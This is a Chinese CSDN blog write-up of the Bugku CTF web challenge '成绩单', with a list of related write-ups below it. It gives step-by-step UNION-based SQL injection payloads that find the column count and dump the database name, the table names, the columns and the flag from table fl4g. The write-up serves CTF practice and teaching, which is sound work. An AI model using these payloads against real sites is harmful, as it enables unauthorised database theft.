bugku成绩单

最新推荐文章于 2024-06-03 21:49:45 发布
最新推荐文章于 2024-06-03 21:49:45 发布
阅读量897 收藏 4
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43677324/article/details/88368128
版权

bugku成绩单 详细解析

1,我们首先分别输入1,2,3,
均有输出
我们输入1’
没有回响
因此我们可以判断存在sql注入
2.我们分别输入

1' order by 1#
1' order by 2#
1' order by 3#
1' order by 4#

均有回响
但是当我们使用

1' order by 5#

时,没有回响
因此我们可以根据此判断字段数为4
3,
之后就是最精彩的地方了
之后我们联合查询
我们先输入
注意(select好像tm的不是查询,,好像是赋值。。)

1' union select 1,2,3,4#

没有显示有用的东西
因为id=1 所以我们的东西被覆盖
因此呢
我们输入

5' union select 1,2,3,database()#

即设置一个新的id,我们要select的值会显示在表上(覆盖)
在这里插入图片描述
现在我们得到了一个数据库的名字
之后就进行爆表
5’union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#
得到
在这里插入图片描述之后再进行获得里面的列
’ union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=‘fl4g’#
得到
在这里插入图片描述我们得到了列
之后我们获取我们要得到的东西
5’ union select 1,2,3,skctf_flag from fl4g#
在这里插入图片描述得到flag

之后我会写一些关于sql语句的总结

thesummerN
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
bugku杂项题writeup
11-22
bugku杂项题writeup
ctf-web-成绩查询
god_001的博客
04-13 1128
题目: 打开网页: 一个提交页面,按提示入1,2,3能够得到三个成绩单表格:如1时: 查看源代码: 发现,表单使用post方式提交,并且name="id" 猜测使用SQL注入 首先检测闭合方式: 分别post id=1' id=1" 发现post id=1"时,正常,post id=1'时无响应 应该是单引号 ' ' 闭合 再通过order by查询当前表列数: 于是可以判断...
bugku ctf 成绩单 (类似sql注入)
qq_42777804的博客
08-15 1020
原始界面    与以往的sql注入不同,直接在成绩查询栏中 注入     随便入数字 发现居然会出现显示位 之后猜测应该有3个以上的显示位,因为成绩就已经有了3个 ?id=1' union select 1,2,3# 发现没有反应 那么就四个 ?id=1' union select 1,2,3,4#     发现了4个 ,那我们就用最后一个   先...
Bugku---web---成绩查询
最新发布
weixin_47450099的博客
06-03 533
sql注入相关知识,内有各种爆破语句
bugku成绩单(sql注入)writeup
热门推荐
xuchen16的博客
09-20 1万+
解法一:手工注入 入1,2,3分别能查到1,2,3号学生的成绩   SQL注入应该没跑了   入1'返回异常,入1'--+返回异常,入1' #或者1’-- +返回正常,看来过滤了--+   观察,表貌似有四列(名字,Math,English,Chinese),入1' order by 4#返回正常,入1' order by 5#返回异常,看来的确是4列   接下来就开始暴库名...
bugku 成绩单 总结
DreamHigh
08-28 2953
试题地址: http://40.125.170.89:49164/index.php 成绩查询     龙龙龙的成绩单 Math English Chinese 60 60 70 方法一:常规方法 进入这道题目 我们先手遍历一遍 id=-1' union select 1,2,3,4# 发现有四个表且都有回显 于是 就开始爆破吧 通过id=-1...
bugku 成绩单
rommel的博客
08-23 7247
成绩查询 龙龙龙的成绩单 Math English Chinese 60 60 70 进入这道题目 我们先手遍历一遍 id=-1' union select 1,2,3,4# 发现有四个表且都有回显 于是 就开始爆破吧 通过id=-1' union select 1,2,3,database(
bugku pwn libc
09-03
bugku pwn3和pwn5用到的libc文件,原题目中没有给出libc文件,也不容易获取libc版本
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
bugku pwn题libc
11-06
bugku pwn题libc,pwn3做题时可在里面查找system、binsh等
bugku 成绩单详解
qq_35811830的博客
01-26 1226
bugku 成绩单详解 首先打开查询成绩的页面 在火狐浏览器下使用hackbar插件对页面进行post请求,分别依次入id=1,2,3,4 当你这样去试了之后,就会发现当入id=1,2,3,的时候分别有三个孩子的成绩,但是当id=4的时候,成绩单里面的成绩又为空了。 因此我们可以猜测数据库里面一共是有四列的 然后在此处利用内置函数database()爆破获取数据库的名字。 至于为什么使用u...
BugkuCTF-web-成绩单 WP
会下雪的晴天
07-12 1659
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 个人收获:最基本的SQL注入 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 题目描述 解题传送门:http://123.206.87.240:8002/chengjidan/ 解题思路 查看源...
Bugku——成绩单(web)
csu_vc的博客
10-27 2343
可以大概判断出有四个字段 直接上payload-1' union select 1,2,3,database()# -1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#-1' union select 1,2,3,group_conc
BugkuCTF之web题之成绩单
A_dmin的博客
12-07 6213
BugkuCTF之web题之成绩单 1.向其中分别入1,2,3…发现可以查询,当向其中入1’时,程序不能查询,根据观察题目,猜测应该可以大概判断出有四个字段 2.在成绩查询处开始爆数据库名,入0’ union select database(),2,3,4 # 得到: 说明数据库的名为skctf_flag 3.在成绩查询处开始爆数据库表名,入0’ union select table_...
Bugku--学生成绩查询
Golderant的博客
01-17 2984
首先测试正常数据。 尝试在正常数据后加上单引号,发现数据为空,加个注释符发现依旧可以正常出。 尝试获取列数,因为已经出名字和3科分数,所以就猜4和5,得知查询结果中有4列。 尝试直接联合查询,这里要记得把前面查询为空。== 根据数据库去查表名 找到fl4g表,下一步,找列名 最后一步,知道表名知道列名啦,去获取数据吧~~ 关于这个题呢,因为表fl
BugkuCTF】Web--成绩单
VZZmieshenquan的博客
02-09 1070
Description: 快来查查成绩吧 http://123.206.87.240:8002/chengjidan/ Solution: Flag:
Bugku成绩单
Newbiek的博客
04-02 901
首先,正常入测试: Burp发现其为post包,只有1到3可以进行查询: 加单引号测试发现,这是一个注入点: 猜测注入的类型,发现and 1=1没有变化,但是1=2也没有变化: 不是数字型注入就试试字符型注入: 下一步就到了测试页面回显的地方的时候了,因为已经可以发现页面上有变动的地方为成绩单前面的位置、三科成绩的分数所以判断一下是不是有4列到5列(可能还有隐藏的东西): 确认了回显...
bugku 成绩查询
Superpig的博客
11-10 2307
分析 典型的sql联合注入,用bp进行爆破。 step1: 联合注入要求查询列数相同,姓名、语数外一共四个数据,因此select 1,2,3,4 令id=a’是为了使前一个查询无效而回显第二个查询(也可以使用其他字符,只要保证union前的查询无效即可) id=a' union select 1,2,3,4# step2:查询数据库名 id=a' union select 1,2,3,datab...
bugku sodirty
09-03
Bugku sodirty是一个题目,具体的解题过程可以在记录解题过程的介绍中找到。[1] 该题目可能涉及到PHP代码审计、MD5碰撞、比较绕过等内容。而在解题过程中,可能还会用到一些其他的题目和技术,如pwn3、pwn5、短标签...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值